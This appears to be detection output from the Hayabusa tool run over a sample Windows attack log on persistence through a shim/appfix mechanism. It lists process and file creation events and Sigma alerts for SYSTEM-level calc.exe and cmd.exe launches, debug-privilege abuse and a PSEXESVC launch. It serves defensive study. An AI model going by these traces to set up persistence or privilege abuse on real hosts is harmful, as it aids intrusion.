2019-03-20 08:18:50.217 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: wininit.exe | Process: C:\Windows\System32\wininit.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 416 | PGUID: 365ABB72-777F-5C91-0000-001079500000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:50.217 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | LID: 0x3e7 | PID: 428 | PGUID: 365ABB72-777F-5C91-0000-0010BF500000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:50.387 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | LID: 0x3e7 | PID: 456 | PGUID: 365ABB72-777F-5C91-0000-0010D8520000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:50.427 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\services.exe | Process: C:\Windows\System32\services.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 516 | PGUID: 365ABB72-777F-5C91-0000-00100B590000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:50.467 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\lsass.exe | Process: C:\Windows\System32\lsass.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 524 | PGUID: 365ABB72-777F-5C91-0000-0010B95B0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:50.497 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\lsm.exe | Process: C:\Windows\System32\lsm.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 532 | PGUID: 365ABB72-777F-5C91-0000-0010EA5B0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:51.308 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 640 | PGUID: 365ABB72-7780-5C91-0000-00103C730000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:51.599 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\VBoxService.exe | Process: C:\Windows\System32\VBoxService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 704 | PGUID: 365ABB72-7780-5C91-0000-0010CFB00000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:51.679 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 904 | PGUID: 365ABB72-7781-5C91-0000-001040B90000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:51.789 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1016 | PGUID: 365ABB72-7781-5C91-0000-001036CB0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:53.111 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1140 | PGUID: 365ABB72-7782-5C91-0000-00102D0B0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:53.501 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\Tasks\SA.DAT | Process: C:\Windows\system32\svchost.exe | PID: 1040 | PGUID: 365ABB72-7781-5C91-0000-0010C2CC0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:53.571 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\spoolsv.exe | Process: C:\Windows\System32\spoolsv.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1412 | PGUID: 365ABB72-7783-5C91-0000-0010DB2C0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:53.922 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:53.922 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1536 | PGUID: 365ABB72-7783-5C91-0000-001025410100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.102 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Startup | Process: C:\Windows\System32\gpscript.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x3e7 | PID: 1616 | PGUID: 365ABB72-7794-5C91-0000-0010DF510100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1628 | PGUID: 365ABB72-77A2-5C91-0000-00106D560100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1636 | PGUID: 365ABB72-77A2-5C91-0000-00100A570100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.182 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.182 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1676 | PGUID: 365ABB72-77A2-5C91-0000-001006590100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.593 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\freeSSHd\FreeSSHDService.exe"" | Process: C:\Program Files\freeSSHd\FreeSSHDService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1788 | PGUID: 365ABB72-77C0-5C91-0000-001044720100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.603 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.603 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1820 | PGUID: 365ABB72-77C0-5C91-0000-00106C740100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.623 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\Temp\wodCmdTerm.exe | Process: C:\Program Files\freeSSHd\FreeSSHDService.exe | PID: 1788 | PGUID: 365ABB72-77C0-5C91-0000-001044720100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.783 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""taskhost.exe"" | Process: C:\Windows\System32\taskhost.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x17dad | PID: 1960 | PGUID: 365ABB72-77C4-5C91-0000-001013850100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.793 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x17dad | PID: 1972 | PGUID: 365ABB72-77C4-5C91-0000-001011860100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.813 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\slui.exe"" | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x17dad | PID: 1988 | PGUID: 365ABB72-77C4-5C91-0000-0010EA870100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.224 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.224 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1100 | PGUID: 365ABB72-77DE-5C91-0000-00105EA30100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.404 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.404 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1308 | PGUID: 365ABB72-77FC-5C91-0000-0010E8C10100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.514 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.514 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1560 | PGUID: 365ABB72-781A-5C91-0000-001013CD0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.544 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.544 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1696 | PGUID: 365ABB72-7838-5C91-0000-0010E0D60100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.594 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.594 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 316 | PGUID: 365ABB72-7856-5C91-0000-00109FE20100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.654 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Logon | Process: C:\Windows\System32\gpscript.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x17dad | PID: 1028 | PGUID: 365ABB72-785E-5C91-0000-001031E60100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.654 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\userinit.exe | Process: C:\Windows\System32\userinit.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x17dad | PID: 1152 | PGUID: 365ABB72-785E-5C91-0000-0010C5E60100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.725 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0x17dad | PID: 1928 | PGUID: 365ABB72-785E-5C91-0000-00103FEA0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.805 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe $(Arg0) | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 256 | PGUID: 365ABB72-7874-5C91-0000-0010F1020200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.835 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.835 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1264 | PGUID: 365ABB72-7874-5C91-0000-0010130B0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.965 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\Sysmon.exe | Process: C:\Windows\Sysmon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 988 | PGUID: 365ABB72-7892-5C91-0000-0010DE160200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:56.055 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:56.055 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 584 | PGUID: 365ABB72-7893-5C91-0000-0010441C0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:56.376 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:56.376 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 832 | PGUID: 365ABB72-78B1-5C91-0000-001001300200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:56.406 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wlms\wlms.exe | Process: C:\Windows\System32\wlms\wlms.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1736 | PGUID: 365ABB72-78CF-5C91-0000-0010F23A0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:56.626 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\unsecapp.exe -Embedding | Process: C:\Windows\System32\wbem\unsecapp.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 1596 | PGUID: 365ABB72-78CF-5C91-0000-0010BE4B0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:57.237 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\UI0Detect.exe | Process: C:\Windows\System32\UI0Detect.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2180 | PGUID: 365ABB72-78D0-5C91-0000-00108A650200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:57.627 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x17dad | PID: 2332 | PGUID: 365ABB72-78D0-5C91-0000-0010F6710200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:58.278 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" | Process: C:\Windows\System32\cmd.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x17dad | PID: 2572 | PGUID: 365ABB72-78D2-5C91-0000-0010D8A50200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:58.288 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\PSEXESVC.exe"" | Process: C:\Windows\PSEXESVC.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x17dad | PID: 2584 | PGUID: 365ABB72-78D2-5C91-0000-0010FFAB0200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:58.489 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: msg * ""hello from run key"" | Process: C:\Windows\System32\msg.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" | LID: 0x17dad | PID: 2692 | PGUID: 365ABB72-78D3-5C91-0000-0010B0D30200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:58.989 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x17dad | PID: 2844 | PGUID: 365ABB72-78D6-5C91-0000-0010CE170300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:19:04.187 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe SYSTEM | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3188 | PGUID: 365ABB72-78E8-5C91-0000-001054030400,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:19:10.796 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Process: C:\Windows\System32\mmc.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x17dad | PID: 3328 | PGUID: 365ABB72-78EE-5C91-0000-0010273F0400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:20:19.155 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x17dad | PID: 3496 | PGUID: 365ABB72-7933-5C91-0000-00100AD30600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:20:19.205 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\system32\utilman.exe | PID: 3508 | PGUID: 365ABB72-7933-5C91-0000-0010B7D40600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
